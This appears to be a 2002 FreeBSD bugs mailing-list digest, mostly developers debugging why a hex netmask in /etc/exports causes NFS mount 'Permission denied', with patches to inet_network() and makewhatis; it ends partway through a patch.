FreeBSD.org Synopsis: Half of buffer gets filled with silence when recording Responsible-Changed-From-To: freebsd-bugs->sound Responsible-Changed-By: dwmalone Responsible-Changed-When: Thu Jun 27 09:54:33 PDT 2002 Responsible-Changed-Why: Assign this to the sound guys. http://www.freebsd.org/cgi/query-pr.cgi?pr=37831 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 10: 8:12 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11]) by hub.freebsd.org (Postfix) with SMTP id 0999237B405 for ; Thu, 27 Jun 2002 10:08:07 -0700 (PDT) Received: from lanczos.maths.tcd.ie by salmon.maths.tcd.ie with SMTP id ; 27 Jun 2002 18:08:06 +0100 (BST) Date: Thu, 27 Jun 2002 18:08:02 +0100 From: David Malone To: Emmanuel Duros Cc: freebsd-bugs@freebsd.org Subject: Re: intel 815 based motherboard with a 82562EM chipset Message-ID: <20020627170802.GA54314@lanczos.maths.tcd.ie> References: <3D1B37AA.6060104@udcast.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D1B37AA.6060104@udcast.com> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 06:04:58PM +0200, Emmanuel Duros wrote: > We are using MSI motherboards (model MS 6351) which is an intel i815E > based motherboard with an integrated Ethernet adapter (82562EM chipset). > Our PCs are FreeBSD 4.4R based. I think there may have been a discussion of this, or a related problem, on FreeBSD-stable recently. Note that there were significant improvements to the fxp driver between 4.4 and 4.6, so if you have time to upgrade a machine you may find it improves the situation. David. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 10:30:43 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C436E37B4AA for ; Thu, 27 Jun 2002 10:30:03 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RHU3JU084961 for ; Thu, 27 Jun 2002 10:30:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RHU3PL084959; Thu, 27 Jun 2002 10:30:03 -0700 (PDT) Date: Thu, 27 Jun 2002 10:30:03 -0700 (PDT) Message-Id: <200206271730.g5RHU3PL084959@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Crist J. Clark" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: "Crist J. Clark" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: "Crist J. Clark" To: "Jin Guojun[DSD]" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 10:23:05 -0700 On Thu, Jun 27, 2002 at 09:38:14AM -0700, Jin Guojun[DSD] wrote: > "Crist J. Clark" wrote: [snip] > > I can't reproduce this. > > > > # uname -r > > 4.6-RELEASE > > # grep ^/export /etc/exports > > /export -alldirs -ro -network 192.168.64 -mask 255.255.255.0 > > # kill -HUP `cat /var/run/mountd.pid` > > # showmount -e | grep ^/export > > /export 192.168.64.0 > > > > And on a different machine on that net, I can mount it fine. > > Are you sure that you understand or did things correctly? :-) > (Assume that all lines you typed are not typo !!!) > > Your netmask is 255.255.255.0 not 0xffffff00. If not typo, plesse try > 0xffffff00 , which is asked in "How-To-Repeat" section. Sorry. Wrong cut-n-paste. I did use 0xffffff00 and it seemed to work fine. When did you notice a change? src/sbin/mountd/mountd.c hasn't changed since 4.4-RELEASE. I can't see anything that deals with reading the netmask that has changed since 1998. The mask is actually read with the inet_network(3) function, and I see no significant changes in that for several years either. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 10:30:46 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E7BEB37B432 for ; Thu, 27 Jun 2002 10:30:08 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RHU8JU084975 for ; Thu, 27 Jun 2002 10:30:08 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RHU8VX084974; Thu, 27 Jun 2002 10:30:08 -0700 (PDT) Date: Thu, 27 Jun 2002 10:30:08 -0700 (PDT) Message-Id: <200206271730.g5RHU8VX084974@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Jose M. Alcaide" Subject: Re: kern/39928: wi0 timeouts and hangs the system while sending data (D-Link DWL-650) Reply-To: "Jose M. Alcaide" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39928; it has been noted by GNATS. From: "Jose M. Alcaide" To: freebsd-gnats-submit@FreeBSD.org, jose@we.lc.ehu.es Cc: Subject: Re: kern/39928: wi0 timeouts and hangs the system while sending data (D-Link DWL-650) Date: Thu, 27 Jun 2002 19:25:53 +0200 As Thomas Skibo just pointed out, the problem goes away if WEP is turned off. This may be a symptom of a firmware problem. JMA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 11: 0:26 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 92F0D37B40B for ; Thu, 27 Jun 2002 11:00:09 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RI09JU088507 for ; Thu, 27 Jun 2002 11:00:09 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RI09KA088505; Thu, 27 Jun 2002 11:00:09 -0700 (PDT) Date: Thu, 27 Jun 2002 11:00:09 -0700 (PDT) Message-Id: <200206271800.g5RI09KA088505@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ian Dowse Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: Ian Dowse Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: Ian Dowse To: "Crist J. Clark" Cc: FreeBSD-gnats-submit@FreeBSD.ORG, "Jin Guojun[DSD]" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 18:59:01 +0100 In message <200206271730.g5RHU3PL084959@freefall.freebsd.org>, "Crist J. Clark" writes: > Sorry. Wrong cut-n-paste. I did use 0xffffff00 and it seemed to work > fine. When did you notice a change? src/sbin/mountd/mountd.c hasn't > changed since 4.4-RELEASE. I can't see anything that deals with > reading the netmask that has changed since 1998. The mask is actually > read with the inet_network(3) function, and I see no significant > changes in that for several years either. I'm not sure how this could have ever worked correctly, since inet_network(3) does not support hex addresses of this form. There are also no examples of it on the mountd man page. It is probably a bug that inet_network() is not a bit more picky about what it does accept though. Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 11:20:42 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CE70037B405 for ; Thu, 27 Jun 2002 11:20:03 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RIK3JU094635 for ; Thu, 27 Jun 2002 11:20:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RIK3fA094634; Thu, 27 Jun 2002 11:20:03 -0700 (PDT) Date: Thu, 27 Jun 2002 11:20:03 -0700 (PDT) Message-Id: <200206271820.g5RIK3fA094634@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Crist J. Clark" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: "Crist J. Clark" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: "Crist J. Clark" To: Ian Dowse Cc: FreeBSD-gnats-submit@FreeBSD.ORG, "Jin Guojun[DSD]" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 11:18:01 -0700 On Thu, Jun 27, 2002 at 06:59:01PM +0100, Ian Dowse wrote: > In message <200206271730.g5RHU3PL084959@freefall.freebsd.org>, "Crist J. Clark" > writes: > > Sorry. Wrong cut-n-paste. I did use 0xffffff00 and it seemed to work > > fine. When did you notice a change? src/sbin/mountd/mountd.c hasn't > > changed since 4.4-RELEASE. I can't see anything that deals with > > reading the netmask that has changed since 1998. The mask is actually > > read with the inet_network(3) function, and I see no significant > > changes in that for several years either. > > I'm not sure how this could have ever worked correctly, since > inet_network(3) does not support hex addresses of this form. Actually, it does. The manpage says, All numbers supplied as ``parts'' in a `.' notation may be decimal, octal, or hexadecimal, as specified in the C language (i.e., a leading 0x or 0X implies hexadecimal; otherwise, a leading 0 implies octal; other- wise, the number is interpreted as decimal). And since it is perfectly valid to provide an internet address as a single "part," an address like 0xffffff00 is totally valid by these rules. To illustrate this, all of these are the same IP address, 0xffffff00 4294967040 0xff.0xffff00 255.16776960 0xff.0xff.0xff00 255.255.65280 0xff.0xff.0xff.0x0 255.255.255.0 -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 11:32:39 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 674CD37B420 for ; Thu, 27 Jun 2002 11:30:03 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RIU3JU095814 for ; Thu, 27 Jun 2002 11:30:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RIU3Uv095813; Thu, 27 Jun 2002 11:30:03 -0700 (PDT) Date: Thu, 27 Jun 2002 11:30:03 -0700 (PDT) Message-Id: <200206271830.g5RIU3Uv095813@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Jin Guojun[DSD]" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: "Jin Guojun[DSD]" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: "Jin Guojun[DSD]" To: cjclark@alum.mit.edu Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 11:21:15 -0700 "Crist J. Clark" wrote: > > On Thu, Jun 27, 2002 at 09:38:14AM -0700, Jin Guojun[DSD] wrote: > > "Crist J. Clark" wrote: > > [snip] > > > > I can't reproduce this. > > > > > > # uname -r > > > 4.6-RELEASE > > > # grep ^/export /etc/exports > > > /export -alldirs -ro -network 192.168.64 -mask 255.255.255.0 > > > # kill -HUP `cat /var/run/mountd.pid` > > > # showmount -e | grep ^/export > > > /export 192.168.64.0 > > > > > > And on a different machine on that net, I can mount it fine. > > > > Are you sure that you understand or did things correctly? :-) > > (Assume that all lines you typed are not typo !!!) > > > > Your netmask is 255.255.255.0 not 0xffffff00. If not typo, plesse try > > 0xffffff00 , which is asked in "How-To-Repeat" section. > > Sorry. Wrong cut-n-paste. I did use 0xffffff00 and it seemed to work > fine. When did you notice a change? src/sbin/mountd/mountd.c hasn't > changed since 4.4-RELEASE. I can't see anything that deals with > reading the netmask that has changed since 1998. The mask is actually > read with the inet_network(3) function, and I see no significant > changes in that for several years either. Yesterday, when upgrading OpenSSH, we upgraded FreeBSD to 4.6 and found this problem. I just repeat it now and pasted output below. The showmount does not show any problem, but mount does. The reason I would like to use 0xffffff00 is because we have an automated sys-admin process that grep the netmask from ifconfig, which uses 0xffffffff notation instead of 255.255.255.255 notation, put it into /etc/exports file, and test it locally first. During the upgrading, the server hung on mounting exported partition. So, I tried to mount this partition on a remote host, and got the same result -- Permission denied. After thought a little bit, I manually changed 0xffffff00 to 255.255.255.0 and things started to work. So, I tried to upgrade all servers, which have different hardware, and they all had the same problem on netmask for exporting partitions. Since ifconfig uses hex notation (0xffffffff), and sed/awk/expr has no easy way to convert it to decimal notation (255.255.255.255), it is important to make this work; or ifconfig and exports should use the same notation, either all hex or all decimal. eubie# df /data Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/ad0s2g 546414 22126 480576 4% /data eubie# uname -r 4.6-RELEASE eubie# echo "/data -network 131.243.2 -mask 255.255.255.0" > /etc/exports eubie# kill -HUP `cat /var/run/mountd.pid` eubie# showmount -e Exports list on localhost: /data 131.243.2.0 eubie# mount eubie:/data /mnt eubie# echo "/data -network 131.243.2 -mask 0xffffff00" > /etc/exports eubie# kill -HUP `cat /var/run/mountd.pid` eubie# showmount -e Exports list on localhost: /data 131.243.2.0 eubie# mount eubie:/data /mnt eubie:/data: Permission denied ^C eubie# date Thu Jun 27 11:00:18 PDT 2002 > -- > Crist J. Clark | cjclark@alum.mit.edu > | cjclark@jhu.edu > http://people.freebsd.org/~cjc/ | cjc@freebsd.org -- ------------ Jin Guojun ----------- v --- j_guojun@lbl.gov --- Distributed Systems Department http://www.itg.lbl.gov/~jin M/S 50B-2239 Ph#:(510) 486-7531 Fax: 486-6363 Lawrence Berkeley National Laboratory, Berkeley, CA 94720 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 11:40:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EC56937B405 for ; Thu, 27 Jun 2002 11:40:03 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RIe3JU096793 for ; Thu, 27 Jun 2002 11:40:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RIe3Mg096791; Thu, 27 Jun 2002 11:40:03 -0700 (PDT) Date: Thu, 27 Jun 2002 11:40:03 -0700 (PDT) Message-Id: <200206271840.g5RIe3Mg096791@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ian Dowse Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: Ian Dowse Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: Ian Dowse To: cjclark@alum.mit.edu Cc: FreeBSD-gnats-submit@FreeBSD.ORG, "Jin Guojun[DSD]" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 19:30:48 +0100 In message <20020627111801.B77359@blossom.cjclark.org>, "Crist J. Clark" writes : >On Thu, Jun 27, 2002 at 06:59:01PM +0100, Ian Dowse wrote: >> I'm not sure how this could have ever worked correctly, since >> inet_network(3) does not support hex addresses of this form. > >Actually, it does. The manpage says, > > All numbers supplied as ``parts'' in a `.' notation may be decimal, > octal, or hexadecimal, as specified in the C language (i.e., a leading 0x > or 0X implies hexadecimal; otherwise, a leading 0 implies octal; other- > wise, the number is interpreted as decimal). > >And since it is perfectly valid to provide an internet address as a >single "part," an address like 0xffffff00 is totally valid by these >rules. To illustrate this, all of these are the same IP address, Ok, but the code in inet_network() seems to disagree ... for (val = 0, i = 0; i < n; i++) { val <<= 8; val |= parts[i] & 0xff; } return (val); so 0xffffff00 gets converted to 0. Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 12:10:28 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3768A37B408 for ; Thu, 27 Jun 2002 12:10:04 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RJA4JU004559 for ; Thu, 27 Jun 2002 12:10:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RJA4sI004556; Thu, 27 Jun 2002 12:10:04 -0700 (PDT) Date: Thu, 27 Jun 2002 12:10:04 -0700 (PDT) Message-Id: <200206271910.g5RJA4sI004556@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Crist J. Clark" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: "Crist J. Clark" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: "Crist J. Clark" To: "Jin Guojun[DSD]" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 11:59:55 -0700 On Thu, Jun 27, 2002 at 11:21:15AM -0700, Jin Guojun[DSD] wrote: [snip] OK, I _can_ reproduce this. There is something really, really wack going on. This is actually the issue I thought you were refering to when I first read your PR. Your error is here, > eubie# echo "/data -network 131.243.2 -mask 255.255.255.0" > /etc/exports ^ As I understand inet_network(3), you are refering to the network, 131.243.0.2 And if you change that to, 131.243.2.0 Everything in all of your examples should work fine. This should be trivial to do in your scripting, so I think you have the correction you need for your problem. The real question is why the heck did this ever work? Something quite strange is going on here. In my examples I was in a Class C space, and it worked fine. Yours is Class B, and you hit problems. But I don't see where Class B or Class C addresses ever come into this. Might be time to run mountd(8) in a debugger to see what the heck is going on here. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 12:30:29 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B5D2C37B406 for ; Thu, 27 Jun 2002 12:30:02 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RJU2JU006958 for ; Thu, 27 Jun 2002 12:30:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RJU2je006957; Thu, 27 Jun 2002 12:30:02 -0700 (PDT) Received: from dan.emsphone.com (dan.emsphone.com [199.67.51.101]) by hub.freebsd.org (Postfix) with ESMTP id 1B7A037B400 for ; Thu, 27 Jun 2002 12:21:20 -0700 (PDT) Received: (from dan@localhost) by dan.emsphone.com (8.12.5/8.12.5) id g5RJLIMi072400; Thu, 27 Jun 2002 14:21:18 -0500 (CDT) (envelope-from dan) Message-Id: <200206271921.g5RJLIMi072400@dan.emsphone.com> Date: Thu, 27 Jun 2002 14:21:18 -0500 (CDT) From: Dan Nelson Reply-To: Dan Nelson To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39930: [PATCH] makewhatis crashes on very very long descriptions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39930 >Category: bin >Synopsis: [PATCH] makewhatis crashes on very very long descriptions >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 12:30:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Nelson >Release: FreeBSD 5.0-CURRENT i386 >Organization: The Allant Group >Environment: System: FreeBSD dan.emsphone.com 5.0-CURRENT FreeBSD 5.0-CURRENT #170: Thu Jun 20 14:04:13 CDT 2002 dan@dan.emsphone.com:/usr/src/sys/i386/compile/DANSMP i386 >Description: Makewhatis forgets to update a pointer when resizing an internal buffer, causing the second resize attempt to fail. >How-To-Repeat: Install the qt3 port, which installs the qwidget.3qt manpage, which has so much text in its NAME section that the whatis entry is 13791 bytes. Run "makewhatis", see it coredump. It crashes trying to increase the sbuf from 4096->8912->16384 bytes. >Fix: The only change absolutely required is the addition of the sbuf->last assignment. The other changes were to help debug the problem. bounds-checking gcc flagged the overlapping strcpy and the while line generates an invalid pointer during the compare. Index: makewhatis.c =================================================================== RCS file: /home/ncvs/src/usr.bin/makewhatis/makewhatis.c,v retrieving revision 1.6 diff -u -p -r1.6 makewhatis.c --- makewhatis.c 7 Jun 2002 01:01:08 -0000 1.6 +++ makewhatis.c 27 Jun 2002 18:49:35 -0000 @@ -217,16 +217,19 @@ static void sbuf_need(struct sbuf *sbuf, int nchars) { /* let's assume we only need to double it, but check just in case */ - while (sbuf->end + nchars > sbuf->last) { + while (sbuf->last - sbuf->end < nchars) { int alloc; char *new_content; alloc = (sbuf->last - sbuf->content + 1) * 2; new_content = (char *) malloc(alloc); + if (new_content == NULL) + err(1, "sbuf_need malloc"); memcpy(new_content, sbuf->content, sbuf->end - sbuf->content); sbuf->end = new_content + (sbuf->end - sbuf->content); free(sbuf->content); sbuf->content = new_content; + sbuf->last = sbuf->content + alloc - 1; } } @@ -616,7 +619,7 @@ process_mdoc_line(char *line) next = strchr(next, '"'); if (next == NULL) break; - strcpy(next, &next[1]); + memmove(next, next+1, strlen(next)); line_end--; if (*next != '"') break; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 12:40:23 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AA0ED37B406 for ; Thu, 27 Jun 2002 12:40:04 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RJe4JU008162 for ; Thu, 27 Jun 2002 12:40:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RJe4lR008161; Thu, 27 Jun 2002 12:40:04 -0700 (PDT) Date: Thu, 27 Jun 2002 12:40:04 -0700 (PDT) Message-Id: <200206271940.g5RJe4lR008161@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Jin Guojun[DSD]" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: "Jin Guojun[DSD]" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: "Jin Guojun[DSD]" To: cjclark@alum.mit.edu Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 12:33:19 -0700 "Crist J. Clark" wrote: > > On Thu, Jun 27, 2002 at 11:21:15AM -0700, Jin Guojun[DSD] wrote: > [snip] > > OK, I _can_ reproduce this. There is something really, really wack > going on. This is actually the issue I thought you were refering to > when I first read your PR. > > Your error is here, > > > eubie# echo "/data -network 131.243.2 -mask 255.255.255.0" > /etc/exports > ^ > As I understand inet_network(3), you are refering to the network, > > 131.243.0.2 > > And if you change that to, > > 131.243.2.0 > > Everything in all of your examples should work fine. This should be > trivial to do in your scripting, so I think you have the correction you > need for your problem. This is very minor to change if it s true. But the problem is not quite like that. Showmount says both 131.243.2 and 131.243.2.0 are correct and the problem persists: eubie# echo "/data -network 131.243.2.0 -mask 0xffffff00" > /etc/exports eubie# kill -HUP `cat /var/run/mountd.pid` eubie# showmount -e Exports list on localhost: /data 131.243.2.0 eubie# mount eubie:/data /mnt eubie:/data: Permission denied ^C eubie# echo "/data -network 131.243.2 -mask 0xffffff00" > /etc/exports eubie# kill -HUP `cat /var/run/mountd.pid` eubie# showmount -e Exports list on localhost: /data 131.243.2.0 eubie# mount eubie:/data /mnt eubie:/data: Permission denied ^C I will try reinstall it without X or other packages. It seems to me when I first time tested 4.6 without X and other stuff, it had not problem; but do not remember what was exactly. More later. -Jin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 13:20:48 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9D64D37B405 for ; Thu, 27 Jun 2002 13:20:27 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RKK5JU016634 for ; Thu, 27 Jun 2002 13:20:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RKK4k0016627; Thu, 27 Jun 2002 13:20:04 -0700 (PDT) Date: Thu, 27 Jun 2002 13:20:04 -0700 (PDT) Message-Id: <200206272020.g5RKK4k0016627@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ian Dowse Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: Ian Dowse Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: Ian Dowse To: "Crist J. Clark" Cc: "Jin Guojun[DSD]" , FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 21:10:13 +0100 In message <200206271910.g5RJA4sI004556@freefall.freebsd.org>, "Crist J. Clark" writes: > Your error is here, > > > eubie# echo "/data -network 131.243.2 -mask 255.255.255.0" > /etc/exports > ^ > As I understand inet_network(3), you are refering to the network, > > 131.243.0.2 I'm not super-familiour with the intricacies of parsing <4 part IP addresses, but if you look at the code or instrument mountd, you will see that this is not the case for inet_network() (I think the effect you refer to happens to IP addresses, not network numbers). Below is a simple patch for inet_network() that makes it support 32-bit hex network numbers. It now also returns INADDR_NONE in a few cases where previously the number would be silently truncated. This could probably be improved upon. Ian Index: inet_network.c =================================================================== RCS file: /home/iedowse/CVS/src/lib/libc/net/inet_network.c,v retrieving revision 1.6.2.1 diff -u -r1.6.2.1 inet_network.c --- inet_network.c 21 Apr 2001 14:53:04 -0000 1.6.2.1 +++ inet_network.c 27 Jun 2002 19:55:06 -0000 @@ -85,6 +85,8 @@ return (INADDR_NONE); *pp++ = val; n = pp - parts; + if (val > 0xff) + return (n == 1 ? val : INADDR_NONE); for (val = 0, i = 0; i < n; i++) 